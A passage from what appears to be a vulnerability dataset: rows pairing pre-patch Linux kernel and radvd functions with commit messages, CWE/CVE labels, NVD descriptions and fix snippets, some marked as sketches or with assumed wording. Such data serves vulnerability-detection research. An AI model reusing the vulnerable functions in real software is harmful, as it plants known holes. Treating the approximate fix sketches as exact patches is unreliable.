if (!capable(CAP_NET_ADMIN))
ret = -EPERM;
else
sk->sk_mark = val;
break;
/* We implement the SO_SNDLOWAT etc to
not be settable (1003.1g 5.3) */
case SO_RXQ_OVFL:
sock_valbool_flag(sk, SOCK_RXQ_OVFL, valbool);
break;
case SO_WIFI_STATUS:
sock_valbool_flag(sk, SOCK_WIFI_STATUS, valbool);
break;
case SO_PEEK_OFF:
if (sock->ops->set_peek_off)
sock->ops->set_peek_off(sk, val);
else
ret = -EOPNOTSUPP;
break;
case SO_NOFCS:
sock_valbool_flag(sk, SOCK_NOFCS, valbool);
break;
default:
ret = -ENOPROTOOPT;
break;
}
release_sock(sk);
return ret;
}
| 34,524,812,571,381,987,000,000,000,000,000,000,000 | sock.c | 200,974,059,219,055,230,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2012-6657 | The sock_setsockopt function in net/core/sock.c in the Linux kernel before 3.5.7 does not ensure that a keepalive action is associated with a stream socket, which allows local users to cause a denial of service (system crash) by leveraging the ability to create a raw socket. | https://nvd.nist.gov/vuln/detail/CVE-2012-6657 |
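The guard from commit 3e10986d1d69: tcp_set_keepalive() must only run for TCP stream sockets, since a raw IPPROTO_TCP socket has no TCP state on which to arm a keepalive timer:

	case SO_KEEPALIVE:
#ifdef CONFIG_INET
		if (sk->sk_protocol == IPPROTO_TCP &&
		    sk->sk_type == SOCK_STREAM)
			tcp_set_keepalive(sk, valbool);
#endif
		sock_valbool_flag(sk, SOCK_KEEPOPEN, valbool);
		break;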
1,416 | linux | 6f7b0a2a5c0fb03be7c25bd1745baa50582348ef | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/6f7b0a2a5c0fb03be7c25bd1745baa50582348ef | futex: Forbid uaddr == uaddr2 in futex_wait_requeue_pi()
If uaddr == uaddr2, then we have broken the rule of only requeueing
from a non-pi futex to a pi futex with this call. If we attempt this,
as the trinity test suite manages to do, we miss early wakeups as
q.key is equal to key2 (because they are the same uaddr). We will then
attempt to dereference the pi_mutex (which would exist had the futex_q
been properly requeued to a pi futex) and trigger a NULL pointer
dereference.
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Cc: Dave Jones <davej@redhat.com>
Cc: stable@vger.kernel.org
Link: http://lkml.kernel.org/r/ad82bfe7f7d130247fbe2b5b4275654807774227.1342809673.git.dvhart@linux.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de> | 1 | static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
u32 val, ktime_t *abs_time, u32 bitset,
u32 __user *uaddr2)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct rt_mutex_waiter rt_waiter;
struct rt_mutex *pi_mutex = NULL;
struct futex_hash_bucket *hb;
union futex_key key2 = FUTEX_KEY_INIT;
struct futex_q q = futex_q_init;
int res, ret;
if (!bitset)
return -EINVAL;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
/*
* The waiter is allocated on our stack, manipulated by the requeue
* code while we sleep on uaddr.
*/
debug_rt_mutex_init_waiter(&rt_waiter);
rt_waiter.task = NULL;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
q.bitset = bitset;
q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;
/*
* Prepare to wait on uaddr. On success, increments q.key (key1) ref
* count.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out_key2;
/* Queue the futex_q, drop the hb lock, wait for wakeup. */
futex_wait_queue_me(hb, &q, to);
spin_lock(&hb->lock);
ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
spin_unlock(&hb->lock);
if (ret)
goto out_put_keys;
/*
* In order for us to be here, we know our q.key == key2, and since
* we took the hb->lock above, we also know that futex_requeue() has
* completed and we no longer have to concern ourselves with a wakeup
* race with the atomic proxy lock acquisition by the requeue code. The
* futex_requeue dropped our key1 reference and incremented our key2
* reference count.
*/
/* Check if the requeue code acquired the second futex for us. */
if (!q.rt_waiter) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/
if (q.pi_state && (q.pi_state->owner != current)) {
spin_lock(q.lock_ptr);
ret = fixup_pi_state_owner(uaddr2, &q, current);
spin_unlock(q.lock_ptr);
}
} else {
/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/
WARN_ON(!q.pi_state);
pi_mutex = &q.pi_state->pi_mutex;
ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
debug_rt_mutex_free_waiter(&rt_waiter);
spin_lock(q.lock_ptr);
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr2, &q, !ret);
/*
* If fixup_owner() returned an error, propagate that. If it
* acquired the lock, clear -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/* Unqueue and drop the lock. */
unqueue_me_pi(&q);
}
/*
* If fixup_pi_state_owner() faulted and was unable to handle the
* fault, unlock the rt_mutex and return the fault to userspace.
*/
if (ret == -EFAULT) {
if (pi_mutex && rt_mutex_owner(pi_mutex) == current)
rt_mutex_unlock(pi_mutex);
} else if (ret == -EINTR) {
/*
* We've already been requeued, but cannot restart by calling
* futex_lock_pi() directly. We could restart this syscall, but
* it would detect that the user space "val" changed and return
* -EWOULDBLOCK. Save the overhead of the restart and return
* -EWOULDBLOCK directly.
*/
ret = -EWOULDBLOCK;
}
out_put_keys:
put_futex_key(&q.key);
out_key2:
put_futex_key(&key2);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
| 97,517,838,480,806,140,000,000,000,000,000,000,000 | futex.c | 161,971,375,377,535,860,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2012-6647 | The futex_wait_requeue_pi function in kernel/futex.c in the Linux kernel before 3.5.1 does not ensure that calls have two different futex addresses, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted FUTEX_WAIT_REQUEUE_PI command. | https://nvd.nist.gov/vuln/detail/CVE-2012-6647 |
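The fix is a single early check at the top of futex_wait_requeue_pi(), enforcing the rule stated in the commit message that a requeue must go from a non-pi futex to a *different* pi futex:

	if (!bitset)
		return -EINVAL;

	if (uaddr == uaddr2)
		return -EINVAL;	/* never requeue a futex onto itself */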
1,417 | linux | fdf5af0daf8019cec2396cdef8fb042d80fe71fa | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/fdf5af0daf8019cec2396cdef8fb042d80fe71fa | tcp: drop SYN+FIN messages
Denys Fedoryshchenko reported that SYN+FIN attacks were bringing his
linux machines to their limits.
Don't call conn_request() if the TCP flags include both SYN and FIN
Reported-by: Denys Fedoryshchenko <denys@visp.net.lb>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb,
const struct tcphdr *th, unsigned int len)
{
struct tcp_sock *tp = tcp_sk(sk);
struct inet_connection_sock *icsk = inet_csk(sk);
int queued = 0;
int res;
tp->rx_opt.saw_tstamp = 0;
switch (sk->sk_state) {
case TCP_CLOSE:
goto discard;
case TCP_LISTEN:
if (th->ack)
return 1;
if (th->rst)
goto discard;
if (th->syn) {
if (icsk->icsk_af_ops->conn_request(sk, skb) < 0)
return 1;
/* Now we have several options: In theory there is
* nothing else in the frame. KA9Q has an option to
* send data with the syn, BSD accepts data with the
* syn up to the [to be] advertised window and
* Solaris 2.1 gives you a protocol error. For now
* we just ignore it, that fits the spec precisely
* and avoids incompatibilities. It would be nice in
* future to drop through and process the data.
*
* Now that TTCP is starting to be used we ought to
* queue this data.
* But, this leaves one open to an easy denial of
* service attack, and SYN cookies can't defend
* against this problem. So, we drop the data
* in the interest of security over speed unless
* it's still in use.
*/
kfree_skb(skb);
return 0;
}
goto discard;
case TCP_SYN_SENT:
queued = tcp_rcv_synsent_state_process(sk, skb, th, len);
if (queued >= 0)
return queued;
/* Do step6 onward by hand. */
tcp_urg(sk, skb, th);
__kfree_skb(skb);
tcp_data_snd_check(sk);
return 0;
}
res = tcp_validate_incoming(sk, skb, th, 0);
if (res <= 0)
return -res;
/* step 5: check the ACK field */
if (th->ack) {
int acceptable = tcp_ack(sk, skb, FLAG_SLOWPATH) > 0;
switch (sk->sk_state) {
case TCP_SYN_RECV:
if (acceptable) {
tp->copied_seq = tp->rcv_nxt;
smp_mb();
tcp_set_state(sk, TCP_ESTABLISHED);
sk->sk_state_change(sk);
/* Note that this wakeup is only for the marginal
* crossed SYN case. Passively open sockets
* are not woken up, because sk->sk_sleep ==
* NULL and sk->sk_socket == NULL.
*/
if (sk->sk_socket)
sk_wake_async(sk,
SOCK_WAKE_IO, POLL_OUT);
tp->snd_una = TCP_SKB_CB(skb)->ack_seq;
tp->snd_wnd = ntohs(th->window) <<
tp->rx_opt.snd_wscale;
tcp_init_wl(tp, TCP_SKB_CB(skb)->seq);
if (tp->rx_opt.tstamp_ok)
tp->advmss -= TCPOLEN_TSTAMP_ALIGNED;
/* Make sure socket is routed, for
* correct metrics.
*/
icsk->icsk_af_ops->rebuild_header(sk);
tcp_init_metrics(sk);
tcp_init_congestion_control(sk);
/* Prevent spurious tcp_cwnd_restart() on
* first data packet.
*/
tp->lsndtime = tcp_time_stamp;
tcp_mtup_init(sk);
tcp_initialize_rcv_mss(sk);
tcp_init_buffer_space(sk);
tcp_fast_path_on(tp);
} else {
return 1;
}
break;
case TCP_FIN_WAIT1:
if (tp->snd_una == tp->write_seq) {
tcp_set_state(sk, TCP_FIN_WAIT2);
sk->sk_shutdown |= SEND_SHUTDOWN;
dst_confirm(__sk_dst_get(sk));
if (!sock_flag(sk, SOCK_DEAD))
/* Wake up lingering close() */
sk->sk_state_change(sk);
else {
int tmo;
if (tp->linger2 < 0 ||
(TCP_SKB_CB(skb)->end_seq != TCP_SKB_CB(skb)->seq &&
after(TCP_SKB_CB(skb)->end_seq - th->fin, tp->rcv_nxt))) {
tcp_done(sk);
NET_INC_STATS_BH(sock_net(sk), LINUX_MIB_TCPABORTONDATA);
return 1;
}
tmo = tcp_fin_time(sk);
if (tmo > TCP_TIMEWAIT_LEN) {
inet_csk_reset_keepalive_timer(sk, tmo - TCP_TIMEWAIT_LEN);
} else if (th->fin || sock_owned_by_user(sk)) {
/* Bad case. We could lose such FIN otherwise.
* It is not a big problem, but it looks confusing
* and is not such a rare event. We still can lose it now,
* if it spins in bh_lock_sock(), but it is really
* a marginal case.
*/
inet_csk_reset_keepalive_timer(sk, tmo);
} else {
tcp_time_wait(sk, TCP_FIN_WAIT2, tmo);
goto discard;
}
}
}
break;
case TCP_CLOSING:
if (tp->snd_una == tp->write_seq) {
tcp_time_wait(sk, TCP_TIME_WAIT, 0);
goto discard;
}
break;
case TCP_LAST_ACK:
if (tp->snd_una == tp->write_seq) {
tcp_update_metrics(sk);
tcp_done(sk);
goto discard;
}
break;
}
} else
goto discard;
/* step 6: check the URG bit */
tcp_urg(sk, skb, th);
/* step 7: process the segment text */
switch (sk->sk_state) {
case TCP_CLOSE_WAIT:
case TCP_CLOSING:
case TCP_LAST_ACK:
if (!before(TCP_SKB_CB(skb)->seq, tp->rcv_nxt))
break;
case TCP_FIN_WAIT1:
case TCP_FIN_WAIT2:
/* RFC 793 says to queue data in these states,
* RFC 1122 says we MUST send a reset.
* BSD 4.4 also does reset.
*/
if (sk->sk_shutdown & RCV_SHUTDOWN) {
if (TCP_SKB_CB(skb)->end_seq != TCP_SKB_CB(skb)->seq &&
after(TCP_SKB_CB(skb)->end_seq - th->fin, tp->rcv_nxt)) {
NET_INC_STATS_BH(sock_net(sk), LINUX_MIB_TCPABORTONDATA);
tcp_reset(sk);
return 1;
}
}
/* Fall through */
case TCP_ESTABLISHED:
tcp_data_queue(sk, skb);
queued = 1;
break;
}
/* tcp_data could move socket to TIME-WAIT */
if (sk->sk_state != TCP_CLOSE) {
tcp_data_snd_check(sk);
tcp_ack_snd_check(sk);
}
if (!queued) {
discard:
__kfree_skb(skb);
}
return 0;
}
| 47,732,656,845,780,370,000,000,000,000,000,000,000 | tcp_input.c | 112,625,197,681,995,050,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2012-6638 | The tcp_rcv_state_process function in net/ipv4/tcp_input.c in the Linux kernel before 3.2.24 allows remote attackers to cause a denial of service (kernel resource consumption) via a flood of SYN+FIN TCP packets, a different vulnerability than CVE-2012-2663. | https://nvd.nist.gov/vuln/detail/CVE-2012-6638 |
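The fix drops SYN+FIN segments before conn_request() ever runs, inside the TCP_LISTEN branch above:

	if (th->syn) {
		if (th->fin)
			goto discard;	/* SYN+FIN is never a valid open */
		if (icsk->icsk_af_ops->conn_request(sk, skb) < 0)
			return 1;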
1,418 | radvd | 92e22ca23e52066da2258df8c76a2dca8a428bcc | https://github.com/reubenhwk/radvd | https://github.com/reubenhwk/radvd/commit/92e22ca23e52066da2258df8c76a2dca8a428bcc | set_interface_var() doesn't check interface name and blindly does
fopen(path "/" ifname, "w") on it. As "ifname" is an untrusted input, it
should be checked for ".." and/or "/" in it. Otherwise, an infected
unprivileged daemon may overwrite contents of file named "mtu",
"hoplimit", etc. in arbitrary location with arbitrary 32-bit value in
decimal representation ("%d"). If an attacker has a local account or
may create arbitrary symlinks with these names in any location (e.g.
/tmp), any file may be overwritten with a decimal value. | 1 | set_interface_var(const char *iface,
const char *var, const char *name,
uint32_t val)
{
FILE *fp;
char spath[64+IFNAMSIZ]; /* XXX: magic constant */
if (snprintf(spath, sizeof(spath), var, iface) >= sizeof(spath))
return -1;
if (access(spath, F_OK) != 0)
return -1;
fp = fopen(spath, "w");
if (!fp) {
if (name)
flog(LOG_ERR, "failed to set %s (%u) for %s: %s",
name, val, iface, strerror(errno));
return -1;
}
fprintf(fp, "%u", val);
fclose(fp);
return 0;
}
| 281,398,530,467,193,600,000,000,000,000,000,000,000 | device-linux.c | 290,895,116,251,977,450,000,000,000,000,000,000,000 | [
"CWE-22"
] | CVE-2011-3602 | Directory traversal vulnerability in device-linux.c in the router advertisement daemon (radvd) before 1.8.2 allows local users to overwrite arbitrary files, and remote attackers to overwrite certain files, via a .. (dot dot) in an interface name. NOTE: this can be leveraged with a symlink to overwrite arbitrary files. | https://nvd.nist.gov/vuln/detail/CVE-2011-3602 |
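The fix rejects interface names that could escape the sysctl directory, placed before the snprintf() that builds spath (exact comment wording assumed):

	/* No path traversal: an interface name must never contain
	 * ".." or a '/' */
	if (strstr(iface, "..") || strchr(iface, '/'))
		return -1;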
1,419 | linux | 819cbb120eaec7e014e5abd029260db1ca8c5735 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/819cbb120eaec7e014e5abd029260db1ca8c5735 | staging: comedi: fix infoleak to userspace
driver_name and board_name are pointers to strings, not buffers of size
COMEDI_NAMELEN. Copying COMEDI_NAMELEN bytes of a string containing
less than COMEDI_NAMELEN-1 bytes would leak some unrelated bytes.
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Cc: stable <stable@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de> | 1 | static int do_devinfo_ioctl(struct comedi_device *dev,
struct comedi_devinfo __user *arg,
struct file *file)
{
struct comedi_devinfo devinfo;
const unsigned minor = iminor(file->f_dentry->d_inode);
struct comedi_device_file_info *dev_file_info =
comedi_get_device_file_info(minor);
struct comedi_subdevice *read_subdev =
comedi_get_read_subdevice(dev_file_info);
struct comedi_subdevice *write_subdev =
comedi_get_write_subdevice(dev_file_info);
memset(&devinfo, 0, sizeof(devinfo));
/* fill devinfo structure */
devinfo.version_code = COMEDI_VERSION_CODE;
devinfo.n_subdevs = dev->n_subdevices;
memcpy(devinfo.driver_name, dev->driver->driver_name, COMEDI_NAMELEN);
memcpy(devinfo.board_name, dev->board_name, COMEDI_NAMELEN);
if (read_subdev)
devinfo.read_subdevice = read_subdev - dev->subdevices;
else
devinfo.read_subdevice = -1;
if (write_subdev)
devinfo.write_subdevice = write_subdev - dev->subdevices;
else
devinfo.write_subdevice = -1;
if (copy_to_user(arg, &devinfo, sizeof(struct comedi_devinfo)))
return -EFAULT;
return 0;
}
| 274,220,629,135,533,150,000,000,000,000,000,000,000 | comedi_fops.c | 50,834,563,733,571,210,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2011-2909 | The do_devinfo_ioctl function in drivers/staging/comedi/comedi_fops.c in the Linux kernel before 3.1 allows local users to obtain sensitive information from kernel memory via a copy of a short string. | https://nvd.nist.gov/vuln/detail/CVE-2011-2909 |
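Commit 819cbb120eae replaces the two fixed-size memcpy() calls with strlcpy(), so bytes past the NUL of a short driver/board name are never copied out, while the surrounding memset() keeps the rest of the structure zeroed:

	memset(&devinfo, 0, sizeof(devinfo));

	/* fill devinfo structure */
	devinfo.version_code = COMEDI_VERSION_CODE;
	devinfo.n_subdevs = dev->n_subdevices;
	strlcpy(devinfo.driver_name, dev->driver->driver_name, COMEDI_NAMELEN);
	strlcpy(devinfo.board_name, dev->board_name, COMEDI_NAMELEN);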
1,420 | linux | fc3a9157d3148ab91039c75423da8ef97be3e105 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/fc3a9157d3148ab91039c75423da8ef97be3e105 | KVM: X86: Don't report L2 emulation failures to user-space
This patch prevents that emulation failures which result
from emulating an instruction for an L2-Guest results in
being reported to userspace.
Without this patch a malicious L2-Guest would be able to
kill the L1 by triggering a race-condition between a vmexit
and the instruction emulator.
With this patch the L2 will most likely only kill itself in
this situation.
Signed-off-by: Joerg Roedel <joerg.roedel@amd.com>
Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> | 1 | static int handle_emulation_failure(struct kvm_vcpu *vcpu)
{
++vcpu->stat.insn_emulation_fail;
trace_kvm_emulate_insn_failed(vcpu);
vcpu->run->exit_reason = KVM_EXIT_INTERNAL_ERROR;
vcpu->run->internal.suberror = KVM_INTERNAL_ERROR_EMULATION;
vcpu->run->internal.ndata = 0;
kvm_queue_exception(vcpu, UD_VECTOR);
return EMULATE_FAIL;
}
| 279,029,284,746,417,500,000,000,000,000,000,000,000 | x86.c | 157,489,028,681,611,200,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2010-5313 | Race condition in arch/x86/kvm/x86.c in the Linux kernel before 2.6.38 allows L2 guest OS users to cause a denial of service (L1 guest OS crash) via a crafted instruction that triggers an L2 emulation failure report, a similar issue to CVE-2014-7842. | https://nvd.nist.gov/vuln/detail/CVE-2010-5313 |
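The fixed function only escalates to userspace when the failure happened in L1; an L2-triggered failure just injects #UD back into the guest. A sketch mirroring commit fc3a9157d314:

static int handle_emulation_failure(struct kvm_vcpu *vcpu)
{
	int r = EMULATE_DONE;

	++vcpu->stat.insn_emulation_fail;
	trace_kvm_emulate_insn_failed(vcpu);
	if (!is_guest_mode(vcpu)) {
		/* only an L1 failure is reported to userspace */
		vcpu->run->exit_reason = KVM_EXIT_INTERNAL_ERROR;
		vcpu->run->internal.suberror = KVM_INTERNAL_ERROR_EMULATION;
		vcpu->run->internal.ndata = 0;
		r = EMULATE_FAIL;
	}
	kvm_queue_exception(vcpu, UD_VECTOR);

	return r;
}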
1,421 | linux | acff81ec2c79492b180fade3c2894425cd35a545 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/acff81ec2c79492b180fade3c2894425cd35a545 | ovl: fix permission checking for setattr
[Al Viro] The bug is in being too enthusiastic about optimizing ->setattr()
away - instead of "copy verbatim with metadata" + "chmod/chown/utimes"
(with the former being always safe and the latter failing in case of
insufficient permissions) it tries to combine these two. Note that copyup
itself will have to do ->setattr() anyway; _that_ is where the elevated
capabilities are right. Having these two ->setattr() (one to set verbatim
copy of metadata, another to do what overlayfs ->setattr() had been asked
to do in the first place) combined is where it breaks.
Signed-off-by: Miklos Szeredi <miklos@szeredi.hu>
Cc: <stable@vger.kernel.org>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | int ovl_setattr(struct dentry *dentry, struct iattr *attr)
{
int err;
struct dentry *upperdentry;
err = ovl_want_write(dentry);
if (err)
goto out;
upperdentry = ovl_dentry_upper(dentry);
if (upperdentry) {
mutex_lock(&upperdentry->d_inode->i_mutex);
err = notify_change(upperdentry, attr, NULL);
mutex_unlock(&upperdentry->d_inode->i_mutex);
} else {
err = ovl_copy_up_last(dentry, attr, false);
}
ovl_drop_write(dentry);
out:
return err;
}
| 126,591,340,298,897,650,000,000,000,000,000,000,000 | inode.c | 334,612,864,203,734,400,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-8660 | The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8660 |
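Following Al Viro's note, the fix splits "copy up" from "apply the requested attributes": copy up verbatim first, then let notify_change() do the chmod/chown/utimes under the caller's credentials so insufficient permissions fail as they should. A sketch, assuming an ovl_copy_up() helper that copies metadata verbatim:

	err = ovl_want_write(dentry);
	if (err)
		goto out;

	err = ovl_copy_up(dentry);	/* verbatim copy, no attr merging */
	if (!err) {
		upperdentry = ovl_dentry_upper(dentry);

		mutex_lock(&upperdentry->d_inode->i_mutex);
		err = notify_change(upperdentry, attr, NULL);
		mutex_unlock(&upperdentry->d_inode->i_mutex);
	}
	ovl_drop_write(dentry);
out:
	return err;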
1,422 | linux | 09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
Reported-by: Dmitry Vyukov <dvyukov@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pptp_bind(struct socket *sock, struct sockaddr *uservaddr,
int sockaddr_len)
{
struct sock *sk = sock->sk;
struct sockaddr_pppox *sp = (struct sockaddr_pppox *) uservaddr;
struct pppox_sock *po = pppox_sk(sk);
struct pptp_opt *opt = &po->proto.pptp;
int error = 0;
lock_sock(sk);
opt->src_addr = sp->sa_addr.pptp;
if (add_chan(po))
error = -EBUSY;
release_sock(sk);
return error;
}
| 83,894,244,210,840,040,000,000,000,000,000,000,000 | pptp.c | 269,998,178,809,154,600,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-8569 | The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel through 4.3.3 do not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8569 |
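The missing check is a classic sockaddr length validation; without it, pptp_bind() reads sp->sa_addr.pptp beyond a short user buffer. The guard, per the commit title (which adds it to pptp_connect() as well; see the sketch after the next record):

	if (sockaddr_len < sizeof(struct sockaddr_pppox))
		return -EINVAL;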
1,423 | linux | 09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/09ccfd238e5a0e670d8178cf50180ea81ae09ae1 | pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
Reported-by: Dmitry Vyukov <dvyukov@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pptp_connect(struct socket *sock, struct sockaddr *uservaddr,
int sockaddr_len, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_pppox *sp = (struct sockaddr_pppox *) uservaddr;
struct pppox_sock *po = pppox_sk(sk);
struct pptp_opt *opt = &po->proto.pptp;
struct rtable *rt;
struct flowi4 fl4;
int error = 0;
if (sp->sa_protocol != PX_PROTO_PPTP)
return -EINVAL;
if (lookup_chan_dst(sp->sa_addr.pptp.call_id, sp->sa_addr.pptp.sin_addr.s_addr))
return -EALREADY;
lock_sock(sk);
/* Check for already bound sockets */
if (sk->sk_state & PPPOX_CONNECTED) {
error = -EBUSY;
goto end;
}
/* Check for already disconnected sockets, on attempts to disconnect */
if (sk->sk_state & PPPOX_DEAD) {
error = -EALREADY;
goto end;
}
if (!opt->src_addr.sin_addr.s_addr || !sp->sa_addr.pptp.sin_addr.s_addr) {
error = -EINVAL;
goto end;
}
po->chan.private = sk;
po->chan.ops = &pptp_chan_ops;
rt = ip_route_output_ports(sock_net(sk), &fl4, sk,
opt->dst_addr.sin_addr.s_addr,
opt->src_addr.sin_addr.s_addr,
0, 0,
IPPROTO_GRE, RT_CONN_FLAGS(sk), 0);
if (IS_ERR(rt)) {
error = -EHOSTUNREACH;
goto end;
}
sk_setup_caps(sk, &rt->dst);
po->chan.mtu = dst_mtu(&rt->dst);
if (!po->chan.mtu)
po->chan.mtu = PPP_MRU;
ip_rt_put(rt);
po->chan.mtu -= PPTP_HEADER_OVERHEAD;
po->chan.hdrlen = 2 + sizeof(struct pptp_gre_header);
error = ppp_register_channel(&po->chan);
if (error) {
pr_err("PPTP: failed to register PPP channel (%d)\n", error);
goto end;
}
opt->dst_addr = sp->sa_addr.pptp;
sk->sk_state = PPPOX_CONNECTED;
end:
release_sock(sk);
return error;
}
| 246,845,620,878,079,550,000,000,000,000,000,000,000 | pptp.c | 269,998,178,809,154,600,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-8569 | The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel through 4.3.3 do not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application. | https://nvd.nist.gov/vuln/detail/CVE-2015-8569 |
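And the matching guard in the connect path, placed before any field of *sp is dereferenced:

	if (sockaddr_len < sizeof(struct sockaddr_pppox))
		return -EINVAL;

	if (sp->sa_protocol != PX_PROTO_PPTP)
		return -EINVAL;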
1,433 | linux | 8c7188b23474cca017b3ef354c4a58456f68303a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8c7188b23474cca017b3ef354c4a58456f68303a | RDS: fix race condition when sending a message on unbound socket
Sasha's found a NULL pointer dereference in the RDS connection code when
sending a message to an apparently unbound socket. The problem is caused
by the code checking if the socket is bound in rds_sendmsg(), which checks
the rs_bound_addr field without taking a lock on the socket. This opens a
race where rs_bound_addr is temporarily set but where the transport is not
in rds_bind(), leading to a NULL pointer dereference when trying to
dereference 'trans' in __rds_conn_create().
Vegard wrote a reproducer for this issue, so kindly ask him to share if
you're interested.
I cannot reproduce the NULL pointer dereference using Vegard's reproducer
with this patch, whereas I could without.
Complete earlier incomplete fix to CVE-2015-6937:
74e98eb08588 ("RDS: verify the underlying transport exists before creating a connection")
Cc: David S. Miller <davem@davemloft.net>
Cc: stable@vger.kernel.org
Reviewed-by: Vegard Nossum <vegard.nossum@oracle.com>
Reviewed-by: Sasha Levin <sasha.levin@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
{
struct sock *sk = sock->sk;
struct rds_sock *rs = rds_sk_to_rs(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, usin, msg->msg_name);
__be32 daddr;
__be16 dport;
struct rds_message *rm = NULL;
struct rds_connection *conn;
int ret = 0;
int queued = 0, allocated_mr = 0;
int nonblock = msg->msg_flags & MSG_DONTWAIT;
long timeo = sock_sndtimeo(sk, nonblock);
/* Mirror Linux UDP's mirroring of BSD error message compatibility */
/* XXX: Perhaps MSG_MORE someday */
if (msg->msg_flags & ~(MSG_DONTWAIT | MSG_CMSG_COMPAT)) {
ret = -EOPNOTSUPP;
goto out;
}
if (msg->msg_namelen) {
/* XXX fail non-unicast destination IPs? */
if (msg->msg_namelen < sizeof(*usin) || usin->sin_family != AF_INET) {
ret = -EINVAL;
goto out;
}
daddr = usin->sin_addr.s_addr;
dport = usin->sin_port;
} else {
/* We only care about consistency with ->connect() */
lock_sock(sk);
daddr = rs->rs_conn_addr;
dport = rs->rs_conn_port;
release_sock(sk);
}
/* racing with another thread binding seems ok here */
if (daddr == 0 || rs->rs_bound_addr == 0) {
ret = -ENOTCONN; /* XXX not a great errno */
goto out;
}
if (payload_len > rds_sk_sndbuf(rs)) {
ret = -EMSGSIZE;
goto out;
}
/* size of rm including all sgs */
ret = rds_rm_size(msg, payload_len);
if (ret < 0)
goto out;
rm = rds_message_alloc(ret, GFP_KERNEL);
if (!rm) {
ret = -ENOMEM;
goto out;
}
/* Attach data to the rm */
if (payload_len) {
rm->data.op_sg = rds_message_alloc_sgs(rm, ceil(payload_len, PAGE_SIZE));
if (!rm->data.op_sg) {
ret = -ENOMEM;
goto out;
}
ret = rds_message_copy_from_user(rm, &msg->msg_iter);
if (ret)
goto out;
}
rm->data.op_active = 1;
rm->m_daddr = daddr;
/* rds_conn_create has a spinlock that runs with IRQ off.
* Caching the conn in the socket helps a lot. */
if (rs->rs_conn && rs->rs_conn->c_faddr == daddr)
conn = rs->rs_conn;
else {
conn = rds_conn_create_outgoing(sock_net(sock->sk),
rs->rs_bound_addr, daddr,
rs->rs_transport,
sock->sk->sk_allocation);
if (IS_ERR(conn)) {
ret = PTR_ERR(conn);
goto out;
